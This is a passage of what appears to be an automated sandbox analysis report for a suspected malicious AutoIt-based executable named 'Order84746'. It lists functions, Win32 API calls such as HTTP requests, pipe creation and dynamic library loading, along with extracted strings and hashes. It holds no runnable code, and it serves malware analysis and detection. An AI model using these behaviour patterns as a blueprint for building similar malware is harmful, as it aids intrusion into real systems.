                          • TerminateThread.KERNEL32(?,000001F6,?,?,?,00955DEE,?,?,?,?,?,008EED63), ref: 00929A51
                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00955DEE,?,?,?,?,?,008EED63), ref: 00929A5E
                            • Part of subcall function 009293D1: CloseHandle.KERNEL32(?,?,00929A6B,?,?,?,00955DEE,?,?,?,?,?,008EED63), ref: 009293DB
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00929A71
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00929A78
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 3495660284-0
                          • Opcode ID: d7f7ea2c7d70c2af1a5ae9af81def1f58660d7043b5edf84064fe7a670812b95
                          • Instruction ID: f651a4c67200971a83b598634cda829ed21c6d1c6aef6d23a31babd4b4393f85
                          • Opcode Fuzzy Hash: d7f7ea2c7d70c2af1a5ae9af81def1f58660d7043b5edf84064fe7a670812b95
                          • Instruction Fuzzy Hash: F1F08232A5A211ABD7112BA4FC9DEEF7739FF88701F140429F523950A4DBF59801EB60
                          Function 008E1CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FF4EA: std::exception::exception.LIBCMT ref: 008FF51E
                            • Part of subcall function 008FF4EA: __CxxThrowException@8.LIBCMT ref: 008FF533
                          • __swprintf.LIBCMT ref: 008E1EA6
                          Strings
                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 008E1D49
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Exception@8Throw__swprintfstd::exception::exception
                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                          • API String ID: 2125237772-557222456
                          • Opcode ID: 1dc0f0186b2a7358a89145771efad39f383d2ef63d18a44885e1a155d97b2adb
                          • Instruction ID: 75436a48ef0fc037007035bc9958f078e30a3f3031b3e505ced6815fea60fe18
                          • Opcode Fuzzy Hash: 1dc0f0186b2a7358a89145771efad39f383d2ef63d18a44885e1a155d97b2adb
                          • Instruction Fuzzy Hash: 4B915F715083819FC714EF2AC895C6AB7A8FF96700F00491DF995D72A1EB70ED09CB92
                          Function 0093AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 0093B006
                          • CharUpperBuffW.USER32(?,?), ref: 0093B115
                          • VariantClear.OLEAUT32(?), ref: 0093B298
                            • Part of subcall function 00929DC5: VariantInit.OLEAUT32(00000000), ref: 00929E05
                            • Part of subcall function 00929DC5: VariantCopy.OLEAUT32(?,?), ref: 00929E0E
                            • Part of subcall function 00929DC5: VariantClear.OLEAUT32(?), ref: 00929E1A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                          • API String ID: 4237274167-1221869570
                          • Opcode ID: 62e0d57457eb7611819937f822504ec0b93c122b587dbf19ad61907de3307503
                          • Instruction ID: a6aaf8c71598a61211e58314e0217e7b05f91bca0e580a82341f019136d38912
                          • Opcode Fuzzy Hash: 62e0d57457eb7611819937f822504ec0b93c122b587dbf19ad61907de3307503
                          • Instruction Fuzzy Hash: 259167706083419FCB10DF28C481A5AB7E8FF89700F04496DF99A8B3A2DB31E945CB52
                          Function 00925347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FC6F4: _wcscpy.LIBCMT ref: 008FC717
                          • _memset.LIBCMT ref: 00925438
                          • GetMenuItemInfoW.USER32(?), ref: 00925467
                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00925513
                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0092553D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                          • String ID: 0
                          • API String ID: 4152858687-4108050209
                          • Opcode ID: 5d2203b4800a35a7bc723150af075d85b25de6c8146c48603959e768890897fc
                          • Instruction ID: b70283709792582b9d868c819aed4308115a273a73e46d073f50171b5c8ec49c
                          • Opcode Fuzzy Hash: 5d2203b4800a35a7bc723150af075d85b25de6c8146c48603959e768890897fc
                          • Instruction Fuzzy Hash: D451F3716187219BD714EF28E841A7BB7E9EF86350F050A2DF895D31A4D7B0CD448B92
                          Function 00920213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0092027B
                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009202B1
                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009202C2
                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00920344
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorMode$AddressCreateInstanceProc
                          • String ID: DllGetClassObject
                          • API String ID: 753597075-1075368562
                          • Opcode ID: be51a59147da1f716e5d41ac819afa947f131f58a52704025b9b4d84255ae33e
                          • Instruction ID: 249b7725ba6012e5e41017f13f2929f65a41284b110f373e47bdd75dfc89f2cc
                          • Opcode Fuzzy Hash: be51a59147da1f716e5d41ac819afa947f131f58a52704025b9b4d84255ae33e
                          • Instruction Fuzzy Hash: 33417C71A05228EFDB05CF54D8C4B9A7BB9EF88314B1480ADED099F20AD7F5D944CBA0
                          Function 00925007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00925075
                          • GetMenuItemInfoW.USER32 ref: 00925091
                          • DeleteMenu.USER32(00000004,00000007,00000000), ref: 009250D7
                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009A1708,00000000), ref: 00925120
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Menu$Delete$InfoItem_memset
                          • String ID: 0
                          • API String ID: 1173514356-4108050209
                          • Opcode ID: 172101b2149c37c67a56c45dbc6943600472ab0ad989258592e467870d30e8ff
                          • Instruction ID: 80595be4373f34e1e634f05d61b71f3024fc7ee6a7a7ace509d0d057688a86e8
                          • Opcode Fuzzy Hash: 172101b2149c37c67a56c45dbc6943600472ab0ad989258592e467870d30e8ff
                          • Instruction Fuzzy Hash: 1B41D0302097119FD720DF28EC80B6AB7E8AF85324F054A1EF8A5D7296D770E814CB62
                          Function 00940567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                          Download Yara Rule
                          APIs
                          • CharLowerBuffW.USER32(?,?,?,?), ref: 00940587
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BuffCharLower
                          • String ID: cdecl$none$stdcall$winapi
                          • API String ID: 2358735015-567219261
                          • Opcode ID: 80684356886dcaea64358af1559fb251e7ab5d0eca32a8c5c2000eaa47a5857f
                          • Instruction ID: b2f4c4ad52acfc8fbfeeb89c9a1a3e215849cbd39b31a1bd78743f695680dc28
                          • Opcode Fuzzy Hash: 80684356886dcaea64358af1559fb251e7ab5d0eca32a8c5c2000eaa47a5857f
                          • Instruction Fuzzy Hash: A831837090021AABCF10EF68CD51DEEB3B8FF95314B104629F526A76D1DB71E916CB90
                          Function 0091B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0091B88E
                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0091B8A1
                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 0091B8D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: ComboBox$ListBox
                          • API String ID: 3850602802-1403004172
                          • Opcode ID: 0e89394f20b559d7e5fdd147fb1941d323b35fc9a7c6f8bea75a88770d67c49b
                          • Instruction ID: 8615082f5282328305df2dd99aee2ebf94130a3b73518c06a31408818d9dc59f
                          • Opcode Fuzzy Hash: 0e89394f20b559d7e5fdd147fb1941d323b35fc9a7c6f8bea75a88770d67c49b
                          • Instruction Fuzzy Hash: 2521E172E00108BFDB04AB69C8869FE777EEF56754F10412DF121A21E1DB784D469760
                          Function 009343E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00934401
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00934427
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00934457
                          • InternetCloseHandle.WININET(00000000), ref: 0093449E
                            • Part of subcall function 00935052: GetLastError.KERNEL32(?,?,009343CC,00000000,00000000,00000001), ref: 00935067
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                          • String ID:
                          • API String ID: 1951874230-3916222277
                          • Opcode ID: 5fff2e16179f9adc210fed8f79e9982e3471e829207128137b4f7aa2c8fb18f1
                          • Instruction ID: d821544bf7b4aeee820e8817ccc9165152ea985c6304738a00a17e5b1a961266
                          • Opcode Fuzzy Hash: 5fff2e16179f9adc210fed8f79e9982e3471e829207128137b4f7aa2c8fb18f1
                          • Instruction Fuzzy Hash: 9221A4B1604208BFE7119F54CC89FBF76FDEB88744F11842AF109D6150DA75AD059B72
                          Function 009490E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008FD1BA
                            • Part of subcall function 008FD17C: GetStockObject.GDI32(00000011), ref: 008FD1CE
                            • Part of subcall function 008FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 008FD1D8
                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0094915C
                          • LoadLibraryW.KERNEL32(?), ref: 00949163
                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00949178
                          • DestroyWindow.USER32(?), ref: 00949180
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                          • String ID: SysAnimate32
                          • API String ID: 4146253029-1011021900
                          • Opcode ID: 136d7cdc72aa8d73299660be69a9423b2e8540d3e88ca2f149f8a8089119de48
                          • Instruction ID: 7079ca4384cddcb15dbf575f0e783c2c30e49752e5649d2da71b5d1bee791b8b
                          • Opcode Fuzzy Hash: 136d7cdc72aa8d73299660be69a9423b2e8540d3e88ca2f149f8a8089119de48
                          • Instruction Fuzzy Hash: C721A171618206BBEF208F64DC85FBB37ADEF9E368F100618FA1492190C771DC41A760
                          Function 00929568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(0000000C), ref: 00929588
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009295B9
                          • GetStdHandle.KERNEL32(0000000C), ref: 009295CB
                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00929605
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CreateHandle$FilePipe
                          • String ID: nul
                          • API String ID: 4209266947-2873401336
                          • Opcode ID: a492b2528fc0af4758f19abb82d357bc81942cab6bf1fb41aca5a0e09f8e6d1a
                          • Instruction ID: e4201a7624094736f1547ffcbaf1740b4018f60dd8cc8fa1e9d6e89e400ed894
                          • Opcode Fuzzy Hash: a492b2528fc0af4758f19abb82d357bc81942cab6bf1fb41aca5a0e09f8e6d1a
                          • Instruction Fuzzy Hash: 5D219270700225ABEB21AF29EC05E9E77F8AF89724F204A19FCA1D72D4D770D940DB60
                          Function 00929634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F6), ref: 00929653
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00929683
                          • GetStdHandle.KERNEL32(000000F6), ref: 00929694
                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009296CE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CreateHandle$FilePipe
                          • String ID: nul
                          • API String ID: 4209266947-2873401336
                          • Opcode ID: 2d578528f7878f8f79f4aa4fc109b58dcf127dd27cf22dfe5195bebd00c18401
                          • Instruction ID: 21c50ce9fa323f76e9941b6031cb9511ff16a9c8320021fda6ce6df941d05bbc
                          • Opcode Fuzzy Hash: 2d578528f7878f8f79f4aa4fc109b58dcf127dd27cf22dfe5195bebd00c18401
                          • Instruction Fuzzy Hash: AB218071A002259FDB209F69AC44E9A77ECAF85734F200A19F9B1E72D4E7B4D841CB60
                          Function 0092DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0092DB0A
                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0092DB5E
                          • __swprintf.LIBCMT ref: 0092DB77
                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,0097DC00), ref: 0092DBB5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume__swprintf
                          • String ID: %lu
                          • API String ID: 3164766367-685833217
                          • Opcode ID: 467ac829fe7e906c1f830bffd80ea08412d42c66665cb0eef06b9fc37d3e652c
                          • Instruction ID: 21e60dcfaee45d819775b883fd9e9042d90f819ccc2ff8b58cac2c09b8e7d0c7
                          • Opcode Fuzzy Hash: 467ac829fe7e906c1f830bffd80ea08412d42c66665cb0eef06b9fc37d3e652c
                          • Instruction Fuzzy Hash: 6921B335A00148AFCB10EF69DD85EEEBBB8EF89704B004069F509E7251DBB1EA01CB61
                          Function 0091C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0091C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0091C84A
                            • Part of subcall function 0091C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0091C85D
                            • Part of subcall function 0091C82D: GetCurrentThreadId.KERNEL32 ref: 0091C864
                            • Part of subcall function 0091C82D: AttachThreadInput.USER32(00000000), ref: 0091C86B
                          • GetFocus.USER32 ref: 0091CA05
                            • Part of subcall function 0091C876: GetParent.USER32(?), ref: 0091C884
                          • GetClassNameW.USER32(?,?,00000100), ref: 0091CA4E
                          • EnumChildWindows.USER32(?,0091CAC4), ref: 0091CA76
                          • __swprintf.LIBCMT ref: 0091CA90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                          • String ID: %s%d
                          • API String ID: 3187004680-1110647743
                          • Opcode ID: c4ab011341d779e980edbd791c6d913b60decc69cbdde6b85f2e29328c7f91ef
                          • Instruction ID: ddee941df387a417469b3c682cfd2fe146b418cee6664f95f19ae2dd950ea9f1
                          • Opcode Fuzzy Hash: c4ab011341d779e980edbd791c6d913b60decc69cbdde6b85f2e29328c7f91ef
                          • Instruction Fuzzy Hash: B91172B17402097BDB11BF648CC5FE9376CAF95714F008066FA18AA182DB709585DB71
                          Function 00941945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                          Download Yara Rule
                          APIs
